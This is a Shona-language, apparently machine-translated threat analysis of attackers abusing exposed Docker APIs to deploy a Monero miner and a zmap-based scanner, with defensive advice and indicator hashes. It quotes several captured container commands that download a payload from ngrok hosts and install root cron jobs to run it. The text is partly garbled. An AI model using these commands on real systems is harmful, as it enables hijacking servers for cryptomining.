Isu takaongorora iyo data yakaunganidzwa tichishandisa midziyo yehuchi, iyo yatakagadzira kuronda kutyisidzira. Uye isu takaona chiitiko chakakosha kubva kune vasingadiwe kana vasina kubvumidzwa cryptocurrency miners vakaiswa semidziyo ine hukasha vachishandisa nharaunda-yakaburitswa mufananidzo paDocker Hub. Mufananidzo uyu unoshandiswa sechikamu chesevhisi inoburitsa yakaipa cryptocurrency miners.
Pamusoro pezvo, zvirongwa zvekushanda nemanetiweki zvakaiswa kuti zvipinde zvakavhurika midziyo uye maapplication.
Isu tinosiya midziyo yedu yeuchi sezvairi, kureva, neyakagadzika marongero, pasina matanho ekuchengetedza kana kuteedzera kuiswa kwesoftware. Ndokumbira utarise kuti Docker ine kurudziro yekutanga kuseta kudzivirira zvikanganiso uye nyore kusasimba. Asi mapoto anoshandiswa midziyo, yakagadzirirwa kuona kurwiswa kwakanangana nepuratifomu yekutakura, kwete maapplication ari mukati memidziyo.
Iyo yakaonekwa hutsinye chiitiko chinocherechedzwa zvakare nekuti haidi kusarongeka uye zvakare yakazvimiririra kubva kuDocker vhezheni. Kutsvaga yakarongedzerwa zvisizvo, uye saka yakavhurika, mufananidzo wemudziyo ndizvo zvese zvinodikanwa nevanorwisa kutapurira akawanda akavhurika maseva.
Iyo isina kuvharwa Docker API inobvumira mushandisi kuita akasiyana siyana
Kuruboshwe ndiyo nzira yekuendesa malware. Kurudyi kune nharaunda yeanorwisa, iyo inobvumira kure kure kubuda kwemifananidzo.
Kugoverwa nenyika ye3762 yakavhurika Docker APIs. Kubva pakutsvaga kweShodan kwemusi wa 12.02.2019/XNUMX/XNUMX
Attack cheni uye payload sarudzo
Basa rakashata rakaonekwa kwete chete nerubatsiro rwehuchi. Dhata kubva kuShodan inoratidza kuti nhamba yeDocker APIs yakafumurwa (ona yechipiri girafu) yakawedzera kubva patakaongorora chigadziko chisina kurongeka chinoshandiswa sebhiriji kuendesa Monero cryptocurrency mining software. Muna Gumiguru gore rapfuura (2018, data yazvino
Kuongororwa kwematanda ehuchi kwakaratidza kuti kushandiswa kwemufananidzo wemudziyo kwakabatana nekushandiswa kwe
Tty: false
Command: “-c curl –retry 3 -m 60 -o /tmp9bedce/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d ”hxxp://12f414f1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp9bedce/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp9bedce/etc/cron.d/1m;chroot /tmp9bedce sh -c ”cron || crond””,
Entrypoint: “/bin/sh”
Tty: false,
Command: “-c curl –retry 3 -m 60 -o /tmp570547/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d ”hxxp://5249d5f6[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp570547/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp570547/etc/cron.d/1m;chroot /tmp570547 sh -c ”cron || crond””,
Entrypoint: “/bin/sh”
Tty: false,
Command: “-c curl –retry 3 -m 60 -o /tmp326c80/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed ”hxxp://b27562c1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp326c80/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp326c80/etc/cron.d/1m;chroot /tmp326c80 sh -c ”cron || crond””,
Entrypoint: “/bin/sh”,
Tty: false,
Cmd: “-c curl –retry 3 -m 60 -o /tmp8b9b5b/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed ”hxxp://f30c8cf9[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp8b9b5b/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp8b9b5b/etc/cron.d/1m;chroot /tmp8b9b5b sh -c ”cron || crond””,
Entrypoint: “/bin/sh”
Sezvauri kuona, mafaera akaiswa anotorwa kubva kunogara achichinja maURL. Aya ma URL ane nguva pfupi yekupera, saka mihoro haigone kudhawunirodha mushure mezuva rekupera.
Pane nzira mbiri dzekubhadhara. Yekutanga ndeye ELF mugodhi weLinux (inotsanangurwa seCoinminer.SH.MALXMR.ATNO) inobatanidza kune dziva rekuchera. Chechipiri chinyorwa (TrojanSpy.SH.ZNETMAP.A) chakagadzirirwa kuwana mamwe maturusi etiweki anoshandiswa kuongorora masanji enetiweki uyezve kutsvaga zvitsva zvinotangwa.
Iyo dropper script inoisa maviri akasiyana, ayo anobva ashandiswa kuendesa iyo cryptocurrency miner. The HOST variable ine URL apo mafaira ane utsinye anowanikwa, uye RIP yakasiyana-siyana ndiro zita refaira (chaizvoizvo, hashi) yemugodhi kuti aendeswe. Iyo HOST shanduko inoshanduka pese painochinja hashi. Iyo script inoedzawo kutarisa kuti hapana imwe cryptocurrency miners iri kumhanya pane yakarwiswa server.
Mienzaniso yeHOST neRIP akasiyana, pamwe nekodhi snippet inoshandiswa kutarisa kuti hapana vamwe vashandi vemigodhi vari kushanda.
Asati atanga mugodhi, anotumidzwa zita rekuti nginx. Dzimwe shanduro dzechinyorwa ichi dzinopa zita remugodhi kune mamwe masevhisi ari pamutemo anogona kunge aripo munzvimbo dzeLinux. Izvi zvinowanzokwana kuti upfuure cheki uchipesana nerondedzero yemaitiro ekumhanya.
Iyo yekutsvaga script inewo maitiro. Inoshanda neiyo yakafanana URL sevhisi kuendesa maturusi anodiwa. Pakati pavo pane zmap binary, iyo inoshandiswa kuongorora network uye kuwana runyorwa rweakavhurika madoko. Iyo script inotakurawo imwe bhinari iyo inoshandiswa kudyidzana neakawanikwa masevhisi uye kugamuchira mabhena kubva kwavari kuti aone rumwe ruzivo nezve yakawanikwa sevhisi (semuenzaniso, vhezheni yayo).
Iyo script zvakare inofanosarudza mamwe maseru etiweki ekuongorora, asi izvi zvinoenderana neshanduro yescript. Iyo zvakare inoseta zviteshi zvemasevhisi kubva kumasevhisi - mune iyi kesi, Docker - isati yatanga scan.
Pakangowanikwa zvinangwa zvinogoneka, mabhenji anobviswa otomatiki kubva kwavari. Iyo script zvakare inosefa zvinangwa zvinoenderana nemasevhisi, maapplication, zvikamu kana mapuratifomu ekufarira: Redis, Jenkins, Drupal, MODX,
Iyo yekurwisa vector mufananidzo weDocker, sezvinoonekwa muzvikamu zviviri zvinotevera zvekodhi.
Kumusoro kuri kupa zita rebasa riri pamutemo, uye pazasi pane mashandisirwo anoitwa zmap kuongorora network.
Kumusoro kwakafanotsanangurwa marenji etiweki, pazasi pane chaiwo madoko ekutsvaga masevhisi, kusanganisira Docker
Iyo skrini inoratidza kuti iyo alpine-curl mufananidzo yakatorwa kanopfuura mamirioni gumi
Kubva paAlpine Linux uye curl, chishandiso-chinoshanda CLI chishandiso chekufambisa mafaera pamusoro peakasiyana mapuroteni, unogona kuvaka.
Zvakakosha kuziva kuti chifananidzo ichi (alpine-curl) pachacho hachisi chakaipa, asi sezvaunogona kuona pamusoro apa, chinogona kushandiswa kuita mabasa akaipa. Yakafanana Docker mifananidzo inogona zvakare kushandiswa kuita zvakaipa. Takataura naDocker tikashanda navo panyaya iyi.
kurumbidza
Chiitiko chakurukurwa muchinyorwa chino chinosimbisa kukosha kwekurangarira kuchengeteka kubva pakutanga, kusanganisira zvinotevera kurudziro:
- Kune masystem administrator nevagadziri: Gara uchitarisa yako API marongero kuti uve nechokwadi chekuti zvese zvakagadziriswa kuti zvigamuchire zvikumbiro kubva kune chaiyo sevha kana yemukati network.
- Tevedza musimboti wekodzero shoma: ita shuwa kuti mifananidzo yemidziyo yakasainwa uye yakasimbiswa, dzikamisa kupinda kune zvakakosha zvinhu (container launch sevhisi) uye wedzera encryption kune network yekubatanidza.
- Tevera
mazano uye kugonesa nzira dzekuchengetedza, semuenzaniso.kubva kuDocker uye yakavakirwa-mukatikuchengetedza zvinhu . - Shandisa otomatiki scanning yenguva yekumhanya nemifananidzo kuti uwane rumwe ruzivo nezve maitiro ari kuita mugaba (semuenzaniso, kuona spoofing kana kutsvaga kusasimba). Kudzora kwekushandisa uye kuvimbika kwekutarisa kunobatsira kuteedzera shanduko dzisina kujairika kumaseva, mafaera, uye nzvimbo dzehurongwa.
Trendmicro inobatsira zvikwata zveDevOps kuvaka zvakachengeteka, kuburitsa nekukurumidza, uye kuvhura chero kupi. Trend Micro
Zviratidzo zvekubvumirana
Hashes dzinoenderana:
- 54343fd1555e1f72c2c1d30369013fb40372a88875930c71b8c3a23bbe5bb15e (Coinminer.SH.MALXMR.ATNO)
- f1e53879e992771db6045b94b3f73d11396fbe7b3394103718435982a7161228 (TrojanSpy.SH.ZNETMAP.A)
pamusoro
Source: www.habr.com